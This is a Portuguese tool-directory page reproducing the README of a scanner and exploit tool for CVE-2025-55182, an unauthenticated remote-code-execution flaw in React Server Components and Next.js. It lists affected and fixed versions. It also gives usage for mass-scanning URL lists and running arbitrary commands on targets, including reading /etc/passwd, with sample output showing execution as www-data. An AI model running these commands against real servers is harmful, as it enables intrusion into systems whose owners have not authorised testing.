Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-Scanner — Scanner automatizado para CVE-2025-55182: uma vulnerabilidade RCE crítica em React Server Components e Next.js. | Kitploit
Ferramentas/GitHubGitHub/qixinlee/cve-2025-55182-scanner
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubqixinlee/cve-2025-55182-scanner

CVE-2025-55182-Scanner

Scanner automatizado para CVE-2025-55182: uma vulnerabilidade RCE crítica em React Server Components e Next.js.

Ver Repositório
11há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 RCE Scanner

Ferramenta de detecção e verificação em lote para a vulnerabilidade de execução remota de código CVE-2025-55182 (React2Shell).

⚠️ Vulnerabilidade crítica CVSS 10.0 | Afeta React Server Components e versões Next.js 15.x/16.x | Uso exclusivo para testes de segurança autorizados

Visão geral da vulnerabilidade

CVE-2025-55182 (também conhecida como "React2Shell") é uma vulnerabilidade de execução remota de código (RCE) não autenticada com pontuação máxima CVSS 10.0.

A vulnerabilidade decorre de um problema de desserialização insegura no pacote react-server dos React Server Components (RSC) ao processar o protocolo RSC "Flight". Atacantes podem executar código arbitrário no servidor vulnerável enviando requisições HTTP especialmente elaboradas.

Como o Next.js utiliza o protocolo RSC "Flight", mesmo aplicações criadas com a configuração padrão do create-next-app podem ser exploradas sem que o desenvolvedor precise escrever código adicional. Desde 5 de dezembro de 2025, foi detectada exploração ativa desta vulnerabilidade.

Versões afetadas

React Server Components – versões afetadas:

PacoteVersões afetadas
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js – versões afetadas (usando App Router):

Outros frameworks/ferramentas RSC possivelmente afetados:

  • react-router
  • waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk
  • RedwoodJS (modo RSC)

Mitigações temporárias

⚠️ Importante: não há mitigações temporárias conhecidas para esta vulnerabilidade. Atualizar para versões seguras é a única correção.

Versões recomendadas para atualização:

  • React: atualizar para 19.0.1, 19.1.2 ou 19.2.1
  • Next.js: atualizar para 16.0.7, 15.5.7, 15.4.8 ou 15.3.6

O pacote npm oficial fix-react2shell-next pode ajudar na atualização de aplicações Next.js afetadas.

Instalação de dependências

root@kitploit:~
pip install requests

Modo de uso

Uso básico

root@kitploit:~
# Escaneamento em lote (lê alvos de urls.txt)
python CVE-2025-55182.py -f urls.txt

# Teste de alvo único
python CVE-2025-55182.py -u http://192.168.1.100:3000

Comandos personalizados

root@kitploit:~
# Executar comando whoami
python CVE-2025-55182.py -f urls.txt -c "whoami"

# Executar comando hostname
python CVE-2025-55182.py -u http://target.com -c "hostname"

# Ler arquivo
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"

Opções avançadas

root@kitploit:~
# Definir número de threads e timeout
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15

# Arquivo de saída personalizado
python CVE-2025-55182.py -f urls.txt -o scan_results.csv

# Modo silencioso (apenas URLs vulneráveis)
python CVE-2025-55182.py -f urls.txt -q

Descrição dos parâmetros

Formato do arquivo de URLs

Uma URL por linha, por exemplo:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000

Exemplo de saída

root@kitploit:~
    +---------------------------------------------------------------+
    |   ###   ## #######  ##  ## ########       ## #######          |
    |   ####  ## ##       ## ##     ##          ## ##               |
    |   ## ## ## #####     ###      ##          ## #######          |
    |   ##  #### ##       ## ##     ##      ##  ##       ##         |
    |   ##   ### ####### ##   ##    ##       ####  #######          |
    |                                                               |
    |   CVE-2025-55182 RCE Scanner                                  |
    +---------------------------------------------------------------+

============================================================
  [ CONFIGURAÇÃO ]
============================================================
  > Alvos: 10
  > Threads: 20
  > Comando: id

============================================================
  [ ESCANEANDO ]
============================================================
  [14:30:25] [VULN] http://192.168.1.10:3000
             '--> uid=1000(www-data)
  [14:30:26] [SEGURO] http://192.168.1.11:3000

+==========================================================+
|                  ESCANEAMENTO CONCLUÍDO                  |
+==========================================================+
|  Total de alvos :    10                                  |
|  Vulneráveis    :     1                                  |
|  Seguros        :     9                                  |
|  Erros          :     0                                  |
+==========================================================+

Arquivo de saída

O resultado do escaneamento é salvo no formato CSV, contendo os seguintes campos:

  • url - URL do alvo
  • status - Código de status HTTP
  • vulnerable - Se é vulnerável
  • output - Saída da execução do comando
  • error - Mensagem de erro

Aviso legal

Esta ferramenta destina-se exclusivamente a testes de segurança autorizados. Não a utilize para fins ilegais. O usuário assume toda a responsabilidade pelo seu uso.

Baixar ferramenta
Versão principalFaixa de versões afetadasVersão corrigida
16.0.x≤ 16.0.616.0.7
15.5.x≤ 15.5.615.5.7
15.4.x≤ 15.4.715.4.8
15.3.x≤ 15.3.515.3.6
15.2.x≤ 15.2.5-
15.1.x≤ 15.1.8-
15.0.x≤ 15.0.4-
14.x Canary≥ 14.3.0-canary.77-
ParâmetroDescriçãoValor padrão
-f, --fileArquivo com lista de URLsurls.txt
-u, --urlURL de alvo único-
-t, --threadsNúmero de threads concorrentes20
--timeoutTimeout da requisição (segundos)10
-o, --outputArquivo CSV de saídaresults.csv
-c, --commandComando a ser executadoid
-q, --quietModo silenciosofalse